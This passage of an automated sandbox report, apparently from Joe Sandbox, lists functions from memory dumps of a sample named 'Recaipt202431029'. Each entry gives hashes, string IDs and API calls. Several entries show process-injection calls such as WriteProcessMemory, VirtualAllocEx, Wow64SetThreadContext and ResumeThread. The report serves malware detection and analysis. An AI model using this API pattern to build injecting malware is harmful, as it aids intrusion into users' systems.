                • Instruction Fuzzy Hash: E441EEB0C00A1DCBDB24DFAAC984BCDBBF1BF49304F20856AD418AB255DB756946CF90
                Function 06C759F8 Relevance: 1.6, Strings: 1, Instructions: 341COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Haq
                • API String ID: 0-725504367
                • Opcode ID: 3b764a067bbdea62e6d26fa3be4611812a7b6f42d261e1f80fec6543eaa932f5
                • Instruction ID: f1b8d9258b2a822ad13b49e09935c7d00e38382157bc17858695b8861a297664
                • Opcode Fuzzy Hash: 3b764a067bbdea62e6d26fa3be4611812a7b6f42d261e1f80fec6543eaa932f5
                • Instruction Fuzzy Hash: A6D19C74B002159FDB44DF69C984AAEBBF6EF88300F54846AE405EB355DB34ED85CBA0
                Function 06868EF8 Relevance: 1.6, Strings: 1, Instructions: 326COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: &
                • API String ID: 0-1010288
                • Opcode ID: 0683a1c94f6a800822f351cbabbda70361719be5058d6d8b074f7e3fcd196e2d
                • Instruction ID: 73508220fcfd66ccff92bf5a17787dece478132452a4d3947c35186a6233c5dd
                • Opcode Fuzzy Hash: 0683a1c94f6a800822f351cbabbda70361719be5058d6d8b074f7e3fcd196e2d
                • Instruction Fuzzy Hash: C1C111747006129FDB489F7A959143E7BE7BF882403048969E92ADB3D5DF34EC05CBA1
                Function 06D1CF88 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                Download Yara Rule
                APIs
                • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06D1D018
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: MemoryProcessWrite
                • String ID:
                • API String ID: 3559483778-0
                • Opcode ID: 07525436c56adcebb6a48063e0df8eee32649df86c585b7cf80b8e1897202ca2
                • Instruction ID: a25012d7d3fe5218b0ddee9d270d2164f5ecf5e3eb5d4f1523a6b42fa5d8ee00
                • Opcode Fuzzy Hash: 07525436c56adcebb6a48063e0df8eee32649df86c585b7cf80b8e1897202ca2
                • Instruction Fuzzy Hash: 662116B5D003499FCB10DFAAC985BEEBBF5FF48310F10842AE919A7240D7799945CBA4
                Function 00B6D900 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6D8CE,?,?,?,?,?), ref: 00B6D98F
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: cfbb2f9d148bc520cce8f6791bd059eee766b2d28b698e751a246c02335f93a1
                • Instruction ID: 0874d5b8a3081cd6c0e3d95e9fe7d705d243f6afe9c3b89bf41a956dd7bdbfbe
                • Opcode Fuzzy Hash: cfbb2f9d148bc520cce8f6791bd059eee766b2d28b698e751a246c02335f93a1
                • Instruction Fuzzy Hash: 602114B5D002089FDB10DFAAD985ADEBFF8FB48310F14841AE918A7350D378A941CFA5
                Function 00B6B314 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                Download Yara Rule
                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00B6D8CE,?,?,?,?,?), ref: 00B6D98F
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: a5e721d5d0a7236cf83c6cf4a8c6eef4b7aa7afe6fdb0cacf37f3fd79683303f
                • Instruction ID: b632ff4df0b00b1af832fe8224c7471e27f168252c36ab8ee5ad07fe656d3424
                • Opcode Fuzzy Hash: a5e721d5d0a7236cf83c6cf4a8c6eef4b7aa7afe6fdb0cacf37f3fd79683303f
                • Instruction Fuzzy Hash: 452105B5D002089FDB10DF9AD984AEEBBF8FB48310F14845AE918A3350D379A940CFA0
                Function 06D1D070 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                Download Yara Rule
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D1D0F8
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: d06e216cfc3ff377b1c1002c9bc62a68da1f65088b9f8c56fb9d41667394e453
                • Instruction ID: 077fc0d28d42f334fe9064b125e89a5d27494a33bb65c40235bf1b4e30bf331c
                • Opcode Fuzzy Hash: d06e216cfc3ff377b1c1002c9bc62a68da1f65088b9f8c56fb9d41667394e453
                • Instruction Fuzzy Hash: 082116B1C002499FCF10DFAAC885AEEFBF5FF48310F10842AE919A7250D7799941CBA0
                Function 06D1CDE8 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON
                Download Yara Rule
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1CE6E
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 8d46abc5bd336e2d83f2c4264b66ac624e5d8432ea2ab529ebd907403518f4c0
                • Instruction ID: 93ce8f9ee0f7101f0974450b2e530552749ff8bd1cc5c24accc32ca3e5b4b150
                • Opcode Fuzzy Hash: 8d46abc5bd336e2d83f2c4264b66ac624e5d8432ea2ab529ebd907403518f4c0
                • Instruction Fuzzy Hash: B72145B19002099FCB10DFAAC4857EEBBF4EF49310F148429D519A7240CB789A45CFA0
                Function 06D1D078 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                Download Yara Rule
                APIs
                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06D1D0F8
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: MemoryProcessRead
                • String ID:
                • API String ID: 1726664587-0
                • Opcode ID: c51b8a9baa179451ad7c1b8a911dbbe9f8ce4c5d733efbfe104bf2e779de916b
                • Instruction ID: 3521c25cd1ebee26c5c9a7ad7976c8ba5dc667aa7c2e647d93cda8e4b9617f00
                • Opcode Fuzzy Hash: c51b8a9baa179451ad7c1b8a911dbbe9f8ce4c5d733efbfe104bf2e779de916b
                • Instruction Fuzzy Hash: 022138B1C003499FCB10DFAAC881AEEFBF5FF48310F10842AE519A7240D7799941CBA0
                Function 06D1CDF0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                Download Yara Rule
                APIs
                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06D1CE6E
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: ContextThreadWow64
                • String ID:
                • API String ID: 983334009-0
                • Opcode ID: 7801c8aa4c2b39d05dc36ee38dd68f17e06b4cea6635cca0eec6a1f3e890fe86
                • Instruction ID: 0e42695bf1d14e5146564bf3b7012e47915b7e3a24da0c4ad823b5d775269e71
                • Opcode Fuzzy Hash: 7801c8aa4c2b39d05dc36ee38dd68f17e06b4cea6635cca0eec6a1f3e890fe86
                • Instruction Fuzzy Hash: 382127B1D003099FDB10DFAAC4857EEBBF5EF89314F14842AD519A7240DB78AA45CFA1
                Function 08507E58 Relevance: 1.6, Strings: 1, Instructions: 307COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: d
                • API String ID: 0-2564639436
                • Opcode ID: efcf12e64b5089f95a4185e20d468096b76a37518ef7dad53f3fe01ee2492616
                • Instruction ID: d6585faf7d3835a1d695bbeb880ff26447840a02061bb9bba2da3c22e2f07c80
                • Opcode Fuzzy Hash: efcf12e64b5089f95a4185e20d468096b76a37518ef7dad53f3fe01ee2492616
                • Instruction Fuzzy Hash: 49C11834600606CFCB14CF18C980D6ABBF2FF88315B65CA69D45A9B6A6D731F846CF90
                Function 08512E30 Relevance: 1.6, Strings: 1, Instructions: 305COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146492499.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8510000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID: 0-3916222277
                • Opcode ID: e1b49240def8413dd9e35de7944a211355f22f290a46224659a37ff80977175f
                • Instruction ID: c287cd10427785b5dc067bc54fa9ef4bcd8bd4836f96adb75e94dd523068c2aa
                • Opcode Fuzzy Hash: e1b49240def8413dd9e35de7944a211355f22f290a46224659a37ff80977175f
                • Instruction Fuzzy Hash: DAA145313042548FEB15DB69985066ABBE6FFC5322F28886ED849CB392CB35DC41C7A1
                Function 06D1CEC8 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                Download Yara Rule
                APIs
                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06D1CF36
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 38ff7e128d43e412209bea1ee7c78a05928ec7f98c9f2445402ef39449c4eec1
                • Instruction ID: e03cfba599a5bd2a38d0c0e8ac53f80a3846891070e89e5b108a012967b8e0a1
                • Opcode Fuzzy Hash: 38ff7e128d43e412209bea1ee7c78a05928ec7f98c9f2445402ef39449c4eec1
                • Instruction Fuzzy Hash: 701137718002499FCB10DFAAC845AEEBFF5EF88310F108419E519A7250C779A940CFA0
                Function 06D1CD38 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: 98daac2019d91de11acad6c272d379cd4576317986deff184e5dec7ed35f8620
                • Instruction ID: 772ad1e549828ecd02dcc9190b5beeb2e676203b7d05d816243fd690312f46b1
                • Opcode Fuzzy Hash: 98daac2019d91de11acad6c272d379cd4576317986deff184e5dec7ed35f8620
                • Instruction Fuzzy Hash: CB1146B1D002489ECB24DFAAD8457EEFFF4EF89320F20841AC419A7240C7799945CFA0
                Function 06D1CD40 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.2145480678.0000000006D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D10000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6d10000_Recaipt202431029.jbxd
                Similarity
                • API ID: ResumeThread
                • String ID:
                • API String ID: 947044025-0
                • Opcode ID: f2cc633feec2e4c7bcf34b7bb9bdb713d476eac35f4ffaf40bed1000e562c788
                • Instruction ID: e4f94f0cee530c91b0a0936de473a5836a9c24ee45c8f8c037aba98b3dbfb728
                • Opcode Fuzzy Hash: f2cc633feec2e4c7bcf34b7bb9bdb713d476eac35f4ffaf40bed1000e562c788
                • Instruction Fuzzy Hash: E71128B1D002488FCB10DFAAC8457EEFBF5EF89324F208419D519A7240CB79A944CBA0
                Function 00B6B618 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                Download Yara Rule
                APIs
                • GetModuleHandleW.KERNELBASE(00000000), ref: 00B6B67E
                Memory Dump Source
                • Source File: 00000000.00000002.2123601206.0000000000B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B60000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_b60000_Recaipt202431029.jbxd
                Similarity
                • API ID: HandleModule
                • String ID:
                • API String ID: 4139908857-0
                • Opcode ID: 22cfb7c1d89aaa104319d38845858bb52a86025a9b7650c59d7fc0b6991ff325
                • Instruction ID: 9072beda6c9ec47039ae5db99a9ae4d6715c1b95825df91f28b00c9ceec277e5
                • Opcode Fuzzy Hash: 22cfb7c1d89aaa104319d38845858bb52a86025a9b7650c59d7fc0b6991ff325
                • Instruction Fuzzy Hash: 7411F2B6C003498FCB10DF9AC444ADEFBF4EF89314F10846AD529A7210D379A945CFA5
                Function 08506928 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 3o
                • API String ID: 0-3445067109
                • Opcode ID: 07a69eec06fb9cb0867bf2c1c0b7b726dc08193fee4b50f2ba0bcb50b9e567d7
                • Instruction ID: e75fecb581481961f4dc4a171346100313c3338ab2fab1a3955b42b54738bf10
                • Opcode Fuzzy Hash: 07a69eec06fb9cb0867bf2c1c0b7b726dc08193fee4b50f2ba0bcb50b9e567d7
                • Instruction Fuzzy Hash: 92B11438700605CFCB14DF29C584A6ABBF6FF99305B1584A9E446DB3A2DB34EC45CB61
                Function 06887758 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: Haq
                • API String ID: 0-725504367
                • Opcode ID: 34ac9b7ed2a08e6f907782bef86290c8f150fc1915df1a45b325fc1b4e38ffb1
                • Instruction ID: 53146b02dfbd91e24c309e4b2beb3c60bb7aea5ed9a75dcacc487971ac14fe08
                • Opcode Fuzzy Hash: 34ac9b7ed2a08e6f907782bef86290c8f150fc1915df1a45b325fc1b4e38ffb1
                • Instruction Fuzzy Hash: C4A19F70A007059FC719DF28D580A9EBBF6FF89300B2485A9D059DB362DB75ED4ACB90
                Function 085066D0 Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: ,aq
                • API String ID: 0-3092978723
                • Opcode ID: a869ba4ed671f063e1b2648e139ccc5b917cb4ae9301ddc87aecb5797df97257
                • Instruction ID: 9e04359a4f008acfa01fede7ca0b864c3c80367397229317c9bd358ee5034811
                • Opcode Fuzzy Hash: a869ba4ed671f063e1b2648e139ccc5b917cb4ae9301ddc87aecb5797df97257
                • Instruction Fuzzy Hash: 82719A74B003108FC7189F3CD898A2A7BEAFF99616B1544AEE506CB3B2DA74DC45CB50
                Function 0850B338 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 5a725cc376c53d6fa65c768f0c9e779ce914eca1889ddf2cd95af35fc1cc7e8e
                • Instruction ID: d3b83ce0ad45f33192a57d8e8b8437e6a8305c057c0c7db7d38f668ac6dd4780
                • Opcode Fuzzy Hash: 5a725cc376c53d6fa65c768f0c9e779ce914eca1889ddf2cd95af35fc1cc7e8e
                • Instruction Fuzzy Hash: F9814D74A00605CBDB24DFA9D4D46AEBBB2BF84352F248429D456AB394EF34ED42CF41
                Function 0850B308 Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 186334350f8572cbd105ac9758f456d000fa816f56d7804733779dbc71204695
                • Instruction ID: d29ac17ac7e0d74f2efeaf81f4cf7efd1601b085b84c5f9305c9509edaec76ab
                • Opcode Fuzzy Hash: 186334350f8572cbd105ac9758f456d000fa816f56d7804733779dbc71204695
                • Instruction Fuzzy Hash: 15715E74A00205CFDB24DFA9D4D86AEBBF6BF84362F24846DD456AB394EB309941CF41
                Function 068603F0 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: cU"l^
                • API String ID: 0-329838493
                • Opcode ID: 9d26fc5906fcff6a60bda897b5eee543c88ed95075ffc873caf89fb7b9c1fc9e
                • Instruction ID: 0de045781dc2a4d9ae3c369266a8809c75f15c284a1b2fa28b04c6559e88710c
                • Opcode Fuzzy Hash: 9d26fc5906fcff6a60bda897b5eee543c88ed95075ffc873caf89fb7b9c1fc9e
                • Instruction Fuzzy Hash: 19717E30B002058FCB54EF69D998AAD7BF6EF88314F148469E506EB361DB75EC45CB90
                Function 0850E867 Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: c:
                • API String ID: 0-1827501386
                • Opcode ID: 975b314e1363a056a3a150dcefa0b84c7f351d64ac463c1ebbbf74494f92191a
                • Instruction ID: f044dbcc152182709e6f49f3b2bc65b3334f676a17c742826be335707f15cb4c
                • Opcode Fuzzy Hash: 975b314e1363a056a3a150dcefa0b84c7f351d64ac463c1ebbbf74494f92191a
                • Instruction Fuzzy Hash: 5F715130A006099FCB18DF68D55499EBBF6FF88300B248569E816AB365DF70ED46CF91
                Function 08500AC0 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: d
                • API String ID: 0-2564639436
                • Opcode ID: 47ec2b36ff043d71df7bc8f153c5dee5b57128a1b19e741cf975dee7bf579f43
                • Instruction ID: 613a3454cf6383583e6ac428a8d3b2db5c90586b72265b5aab89dba14b78eb9d
                • Opcode Fuzzy Hash: 47ec2b36ff043d71df7bc8f153c5dee5b57128a1b19e741cf975dee7bf579f43
                • Instruction Fuzzy Hash: D8616774A00A06CFCB14DF59D4809AEFBB6FF88311B108669D91997695DB30F992CFA0
                Function 0850DE50 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $]q
                • API String ID: 0-1007455737
                • Opcode ID: 4946ca1c9268ea15d50729244e220be5770e413b18c710696e98643e759b6f62
                • Instruction ID: 950beeaaf4467da6284a4dec86b81bc2ad38cf24077e415935497ee26cc59434
                • Opcode Fuzzy Hash: 4946ca1c9268ea15d50729244e220be5770e413b18c710696e98643e759b6f62
                • Instruction Fuzzy Hash: BB516130B04201CFEB258EAD849966FB7B6BFC4206F248E6DD502D7395EB35D885CB91
                Function 06C7EBB3 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: %*&/)(#$^@!~-_
                • API String ID: 0-3325533558
                • Opcode ID: db00891e58ada4b959600366f3321a75fca147bb5cb94c795795a8a1d0f4e387
                • Instruction ID: a6a061df939d014c89fcef7b265e49bf90916cd0a4437e7b18b1f104a2c029ad
                • Opcode Fuzzy Hash: db00891e58ada4b959600366f3321a75fca147bb5cb94c795795a8a1d0f4e387
                • Instruction Fuzzy Hash: 2851C231F00214AFD704BB68D445BAE7BB2EF88700F1488A9DA819B3AACE715D49C781
                Function 06C7EBC0 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: %*&/)(#$^@!~-_
                • API String ID: 0-3325533558
                • Opcode ID: b2acf422819b1183a6955b96ec9099c22a3dac378cc3de8d8c4bfb54d4a760e3
                • Instruction ID: 7f7232b768bbf13171b45b66f446e2d3a40660d44e3d6e7f5ac8a6e581d65841
                • Opcode Fuzzy Hash: b2acf422819b1183a6955b96ec9099c22a3dac378cc3de8d8c4bfb54d4a760e3
                • Instruction Fuzzy Hash: 6551A331F00115AFD704BB68D445BAE7BB2EF88700F1488A9DE859B39ACE715D49C781
                Function 06C70CC8 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2144479706.0000000006C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C70000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6c70000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: c0674e73298ade7c87143cdbfd7f34b6620321d5fd5cb9f12f58ef563221d74b
                • Instruction ID: 327ab1d2bedf7fa4901f9e311a533edb231d98b0d8f8294bb81c6757e7436cd3
                • Opcode Fuzzy Hash: c0674e73298ade7c87143cdbfd7f34b6620321d5fd5cb9f12f58ef563221d74b
                • Instruction Fuzzy Hash: 84516DB5F002099FDB55CFA9C884AAEBBF5FF48210F14806AE915AB251D734DE54CBA0
                Function 06887F08 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 6e803470697cd9624afc8b94f52a1abd9a6eb880ce00c90f8933d24e240b5798
                • Instruction ID: 3083958105ce02b6673b6dc0c35900d647ad8df63bae79c1fd42104b6ebcd1ca
                • Opcode Fuzzy Hash: 6e803470697cd9624afc8b94f52a1abd9a6eb880ce00c90f8933d24e240b5798
                • Instruction Fuzzy Hash: 41519FB4A007069FC709DF68C58095DBBF6FF89310B1586A9D449DB366DB30ED4ACB90
                Function 06869E40 Relevance: 1.4, Strings: 1, Instructions: 131COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136379539.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6860000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 7
                • API String ID: 0-1790921346
                • Opcode ID: a78b3e8ab79646dca576288daf0e731c658dce88ec8ede96485ebb93e181635b
                • Instruction ID: b055c57f10272bd0debd7a5e985155b8f4d6f22672ca707fb48fb5dc47f3c253
                • Opcode Fuzzy Hash: a78b3e8ab79646dca576288daf0e731c658dce88ec8ede96485ebb93e181635b
                • Instruction Fuzzy Hash: DA417D34A003028FDB95DF2AC850A2EB7B6FF89310B15C5A9E549CB3A6DB71EC45CB51
                Function 06887F18 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: 4']q
                • API String ID: 0-1259897404
                • Opcode ID: 8e1f8dc2970755b8024ad175b024092e1478e41cc204de6963f1d8d7488a69bc
                • Instruction ID: 4a6f332adcfa0a24916b5fbc6c02875e820184d47b6e47707800ba20869e16f0
                • Opcode Fuzzy Hash: 8e1f8dc2970755b8024ad175b024092e1478e41cc204de6963f1d8d7488a69bc
                • Instruction Fuzzy Hash: 67517EB4A007069FC709DF68C58499EBBF6FF89310B1586A9D409DB366DB30ED49CB90
                Function 06888A50 Relevance: 1.4, Strings: 1, Instructions: 119COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2136925941.0000000006880000.00000040.00000800.00020000.00000000.sdmp, Offset: 06880000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_6880000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: `]bq
                • API String ID: 0-248503667
                • Opcode ID: 4c690031afd6a0002695a085fefbd0b5bc4aef8367dd8dcd772fbeb6efbad190
                • Instruction ID: 6c2b749f0b1ce468b3c5c88be8a3215a8d3d8fb22c879362f98cb9d18f35daf3
                • Opcode Fuzzy Hash: 4c690031afd6a0002695a085fefbd0b5bc4aef8367dd8dcd772fbeb6efbad190
                • Instruction Fuzzy Hash: A041D070B006158FCB54EF6DC984A2EBBF5EF85311B5580A9E909DB3A2DB30EC41CB61
                Function 0850FC08 Relevance: 1.4, Strings: 1, Instructions: 117COMMON
                Download Yara Rule
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2146447640.0000000008500000.00000040.00000800.00020000.00000000.sdmp, Offset: 08500000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_8500000_Recaipt202431029.jbxd
                Similarity
                • API ID:
                • String ID: $]q
                • API String ID: 0-1007455737
                • Opcode ID: 98aed43fda3029ece46b6da8a9b983b08706b89fa19acfcf6ee63ba0f8afe02c
                • Instruction ID: fdf428ca8e20f535e9622264faa5791e68c2d44753ef04b2d56b09573df009e5
                • Opcode Fuzzy Hash: 98aed43fda3029ece46b6da8a9b983b08706b89fa19acfcf6ee63ba0f8afe02c
                • Instruction Fuzzy Hash: D7413735604205DFCB25CF68D484BA9BBB2FF88311F188499E9059B2E6CB35DD81CF60
